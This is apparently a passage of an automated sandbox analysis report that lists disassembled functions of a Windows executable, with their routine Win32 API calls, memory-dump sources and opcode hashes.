                                                                                                                                                                        Function 002CCB28 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 002CCBB1
                                                                                                                                                                        • DeleteMenu.USER32(?,00000007,00000000), ref: 002CCBF7
                                                                                                                                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,003329C0,017160F8), ref: 002CCC40
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Menu$Delete$InfoItem
                                                                                                                                                                        • String ID: 0
                                                                                                                                                                        • API String ID: 135850232-4108050209
                                                                                                                                                                        • Opcode ID: 882df7f11441c66b6d8821fea511354d5fff295717918507777f18ca5db3977c
                                                                                                                                                                        • Instruction ID: eb6fb45a3592c487a37a251bf8297038888bfcb132b5fe9a53c62008a478a002
                                                                                                                                                                        • Opcode Fuzzy Hash: 882df7f11441c66b6d8821fea511354d5fff295717918507777f18ca5db3977c
                                                                                                                                                                        • Instruction Fuzzy Hash: 4741A0716143029FD720DF24D885F6ABBE8EF85724F244A1EF4A997291D730AA24CB52
                                                                                                                                                                        Function 002F4EB4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,002FDCD0,00000000,?,?,?,?), ref: 002F4F48
                                                                                                                                                                        • GetWindowLongW.USER32 ref: 002F4F65
                                                                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 002F4F75
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$Long
                                                                                                                                                                        • String ID: SysTreeView32
                                                                                                                                                                        • API String ID: 847901565-1698111956
                                                                                                                                                                        • Opcode ID: 3f1b6c842375eed399b24ee08a38ab2c85bab7b5cf75287393e93251ac38c3ab
                                                                                                                                                                        • Instruction ID: b38970ea55b15002987f4e227b52373540c0cad114c001fdf6a7c413eb60c070
                                                                                                                                                                        • Opcode Fuzzy Hash: 3f1b6c842375eed399b24ee08a38ab2c85bab7b5cf75287393e93251ac38c3ab
                                                                                                                                                                        • Instruction Fuzzy Hash: E331B43112020AAFDB119F38DC45BEBB7A9EF04374F204725FA79921E0C7B0AC609B50
                                                                                                                                                                        Function 002E3AAB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 002E3DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,002E3AD4,?,?), ref: 002E3DD5
                                                                                                                                                                        • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 002E3AD7
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002E3AF8
                                                                                                                                                                        • htons.WSOCK32(00000000,?,?,00000000), ref: 002E3B63
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                                                                                                        • String ID: 255.255.255.255
                                                                                                                                                                        • API String ID: 946324512-2422070025
                                                                                                                                                                        • Opcode ID: f2173c4f68a5619627c00b07061c297bce9ea17ae6c745978ce8978f8e6884c4
                                                                                                                                                                        • Instruction ID: 4542d227cc6b535a52a1a09a266ce0c2ef0d96a7324dcf4b6db0177c695172c8
                                                                                                                                                                        • Opcode Fuzzy Hash: f2173c4f68a5619627c00b07061c297bce9ea17ae6c745978ce8978f8e6884c4
                                                                                                                                                                        • Instruction Fuzzy Hash: F231D3392102829FCB10DF2AC589EA977E1EF14369FA4815DE8178B392D771EE51CB60
                                                                                                                                                                        Function 002F4954 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 002F49DC
                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 002F49F0
                                                                                                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 002F4A14
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend$Window
                                                                                                                                                                        • String ID: SysMonthCal32
                                                                                                                                                                        • API String ID: 2326795674-1439706946
                                                                                                                                                                        • Opcode ID: cb22a7ba8d32ea6adf5d579f39e388b998d33f05b07ed0c57d4e6b5bed1f10f3
                                                                                                                                                                        • Instruction ID: cdce55a49bdd48070f5044edcf2f12378909180c9d41e4958659e1b7c1decb4f
                                                                                                                                                                        • Opcode Fuzzy Hash: cb22a7ba8d32ea6adf5d579f39e388b998d33f05b07ed0c57d4e6b5bed1f10f3
                                                                                                                                                                        • Instruction Fuzzy Hash: 7A21BF32620219ABDF119F50DC46FEF7B69EF48768F110224FB15AB1D0D6B1AC61DB90
                                                                                                                                                                        Function 002F50F1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 002F51A3
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 002F51B1
                                                                                                                                                                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 002F51B8
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend$DestroyWindow
                                                                                                                                                                        • String ID: msctls_updown32
                                                                                                                                                                        • API String ID: 4014797782-2298589950
                                                                                                                                                                        • Opcode ID: c2e62903829374331ddbbec4ae94c608e1be1530b963d8432cd8f3eb1fbe8be0
                                                                                                                                                                        • Instruction ID: 6059888567bc70a0e384011f88189c618dfcfac89a2f06e32417245845708953
                                                                                                                                                                        • Opcode Fuzzy Hash: c2e62903829374331ddbbec4ae94c608e1be1530b963d8432cd8f3eb1fbe8be0
                                                                                                                                                                        • Instruction Fuzzy Hash: D32181B5611619BFDB01DF18DC85EBB77ADEB5A3A4F100059FA049B361CB70EC25CAA0
                                                                                                                                                                        Function 002F4253 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 002F42DC
                                                                                                                                                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 002F42EC
                                                                                                                                                                        • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 002F4312
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend$MoveWindow
                                                                                                                                                                        • String ID: Listbox
                                                                                                                                                                        • API String ID: 3315199576-2633736733
                                                                                                                                                                        • Opcode ID: ca786bc1d46c3fec80fbe86172b9b7f88cb20c4a8bd488519d6c1b90cbd3a076
                                                                                                                                                                        • Instruction ID: 3f1aa2d2a6639a9644dd87713988b2cd304bd5384d35f525d901841fa34bba8e
                                                                                                                                                                        • Opcode Fuzzy Hash: ca786bc1d46c3fec80fbe86172b9b7f88cb20c4a8bd488519d6c1b90cbd3a076
                                                                                                                                                                        • Instruction Fuzzy Hash: BC218332621119BBEB119F94DC85FBF776EEB897A4F118134FA009B190C6B19C618B90
                                                                                                                                                                        Function 002D5439 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 002D544D
                                                                                                                                                                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 002D54A1
                                                                                                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,002FDCD0), ref: 002D5515
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorMode$InformationVolume
                                                                                                                                                                        • String ID: %lu
                                                                                                                                                                        • API String ID: 2507767853-685833217
                                                                                                                                                                        • Opcode ID: f64002dcd903815bd73f66d6e0983921e3e7d0a6eb7492b9b639dad889fe83bd
                                                                                                                                                                        • Instruction ID: 706b39d2d663d22597f6c49ab08da2e974dd1722d76573248d24e893fb510808
                                                                                                                                                                        • Opcode Fuzzy Hash: f64002dcd903815bd73f66d6e0983921e3e7d0a6eb7492b9b639dad889fe83bd
                                                                                                                                                                        • Instruction Fuzzy Hash: 73316170A10109AFDB11DF54C885EAA77B9EF05304F1440A5F909DB362DB71EE95CF61
                                                                                                                                                                        Function 002F8305 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetActiveWindow.USER32 ref: 002F8339
                                                                                                                                                                        • EnumChildWindows.USER32(?,002F802F,00000000), ref: 002F83B0
                                                                                                                                                                          • Part of subcall function 0026249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002624B0
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$ActiveChildEnumLongWindows
                                                                                                                                                                        • String ID: (3$(3
                                                                                                                                                                        • API String ID: 3814560230-4129766594
                                                                                                                                                                        • Opcode ID: a5a2bef351d6defd9a6203d777c0720589d0fdfc82124d3d5656bcc436b256e2
                                                                                                                                                                        • Instruction ID: e70272e05c6d791408157581eba7bc935b40c419047a217653f4a665f85c4ac3
                                                                                                                                                                        • Opcode Fuzzy Hash: a5a2bef351d6defd9a6203d777c0720589d0fdfc82124d3d5656bcc436b256e2
                                                                                                                                                                        • Instruction Fuzzy Hash: ED213E75111609DFC715CF28E880AA6F7F5FB49760F200669F976973A0DB70A860DF50
                                                                                                                                                                        Function 002F4C89 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 002F4CED
                                                                                                                                                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 002F4D02
                                                                                                                                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 002F4D0F
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                                        • String ID: msctls_trackbar32
                                                                                                                                                                        • API String ID: 3850602802-1010561917
                                                                                                                                                                        • Opcode ID: e522beeff9b93d2b784ae8ac20b27ee4a0d2a5162773640554efbc68264956b3
                                                                                                                                                                        • Instruction ID: c2146ae8b59bbf75092109feb5b6494fc8f69f05a438364a4accc039bc36a67f
                                                                                                                                                                        • Opcode Fuzzy Hash: e522beeff9b93d2b784ae8ac20b27ee4a0d2a5162773640554efbc68264956b3
                                                                                                                                                                        • Instruction Fuzzy Hash: 0011233125020CBEEF216F65DC06FBBBBACEF85BA4F110524FA51E60A0C2B1DC609B10
                                                                                                                                                                        Function 002C389E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00268577: _wcslen.LIBCMT ref: 0026858A
                                                                                                                                                                          • Part of subcall function 002C36F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 002C3712
                                                                                                                                                                          • Part of subcall function 002C36F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 002C3723
                                                                                                                                                                          • Part of subcall function 002C36F4: GetCurrentThreadId.KERNEL32 ref: 002C372A
                                                                                                                                                                          • Part of subcall function 002C36F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 002C3731
                                                                                                                                                                        • GetFocus.USER32 ref: 002C38C4
                                                                                                                                                                          • Part of subcall function 002C373B: GetParent.USER32(00000000), ref: 002C3746
                                                                                                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 002C390F
                                                                                                                                                                        • EnumChildWindows.USER32(?,002C3987), ref: 002C3937
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                                                                                        • String ID: %s%d
                                                                                                                                                                        • API String ID: 1272988791-1110647743
                                                                                                                                                                        • Opcode ID: bbebcd3ff604253bb18e77bc90ce232b05d82c63df6c3b7549b067877cc8bebe
                                                                                                                                                                        • Instruction ID: e5fb494b09fa78b88ef6df586a3645524ba51aea4ab148050ce2296f37a0ceb0
                                                                                                                                                                        • Opcode Fuzzy Hash: bbebcd3ff604253bb18e77bc90ce232b05d82c63df6c3b7549b067877cc8bebe
                                                                                                                                                                        • Instruction Fuzzy Hash: 4711D271610209ABCF11BF749C85FED77AAAF98340F008579F9099B292CE719965DF20
                                                                                                                                                                        Function 002659FF Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • DeleteObject.GDI32(?), ref: 00265A34
                                                                                                                                                                        • DestroyWindow.USER32(?,002637B8,?,?,?,?,?,00263709,?,?), ref: 00265A91
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DeleteDestroyObjectWindow
                                                                                                                                                                        • String ID: <)3$<)3
                                                                                                                                                                        • API String ID: 2587070983-3443154064
                                                                                                                                                                        • Opcode ID: d99683ce171b4ceb5a80f8cc3352289068ca68927334195c15c46981bce090cc
                                                                                                                                                                        • Instruction ID: 3c51276d6f1cf8ab11d4259227bb57e1f7cbff64af0c8f3f99b128f48fe9ad29
                                                                                                                                                                        • Opcode Fuzzy Hash: d99683ce171b4ceb5a80f8cc3352289068ca68927334195c15c46981bce090cc
                                                                                                                                                                        • Instruction Fuzzy Hash: E921C734226A12CFDB1ADF59E8D4B2633E9BB45321F155169F8029B261CB74DCB4CB01
                                                                                                                                                                        Function 002F6321 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 002F6360
                                                                                                                                                                        • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 002F638D
                                                                                                                                                                        • DrawMenuBar.USER32(?), ref: 002F639C
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Menu$InfoItem$Draw
                                                                                                                                                                        • String ID: 0
                                                                                                                                                                        • API String ID: 3227129158-4108050209
                                                                                                                                                                        • Opcode ID: afdee3d7c633a88ba8f2ae90cdc195e86352f1c1b8cd2b334d65e426f2f10f8d
                                                                                                                                                                        • Instruction ID: f9406b4cf430411fa39689dab005531314403828d143b43e0e5be94714e844b8
                                                                                                                                                                        • Opcode Fuzzy Hash: afdee3d7c633a88ba8f2ae90cdc195e86352f1c1b8cd2b334d65e426f2f10f8d
                                                                                                                                                                        • Instruction Fuzzy Hash: 1F01C435520218AFDB109F10DC88BBEBBB5FF457A0F1080E9E50AD6150CB308995EF21
                                                                                                                                                                        Function 002F823D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetForegroundWindow.USER32(?,003328E0,002FAD55,000000FC,?,00000000,00000000,?), ref: 002F823F
                                                                                                                                                                        • GetFocus.USER32 ref: 002F8247
                                                                                                                                                                          • Part of subcall function 0026249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002624B0
                                                                                                                                                                          • Part of subcall function 00262234: GetWindowLongW.USER32(?,000000EB), ref: 00262242
                                                                                                                                                                        • SendMessageW.USER32(?,000000B0,000001BC,000001C0), ref: 002F82B4
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$Long$FocusForegroundMessageSend
                                                                                                                                                                        • String ID: (3
                                                                                                                                                                        • API String ID: 3601265619-113007392
                                                                                                                                                                        • Opcode ID: a8d38d77ac44ff33e2be77d27f559ec0cc3cd7d25225e491b606a853ab3d45a8
                                                                                                                                                                        • Instruction ID: a224e5523b392cfb4b4a9fdec3cf1dac1aff188ad3da2d982c5c925f04df9705
                                                                                                                                                                        • Opcode Fuzzy Hash: a8d38d77ac44ff33e2be77d27f559ec0cc3cd7d25225e491b606a853ab3d45a8
                                                                                                                                                                        • Instruction Fuzzy Hash: A9017531602945CFC315DF78D859A76B3E6EB89360F140179E9168B2A0CF316C57CB40
                                                                                                                                                                        Function 002F8526 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • DestroyAcceleratorTable.USER32(?), ref: 002F8576
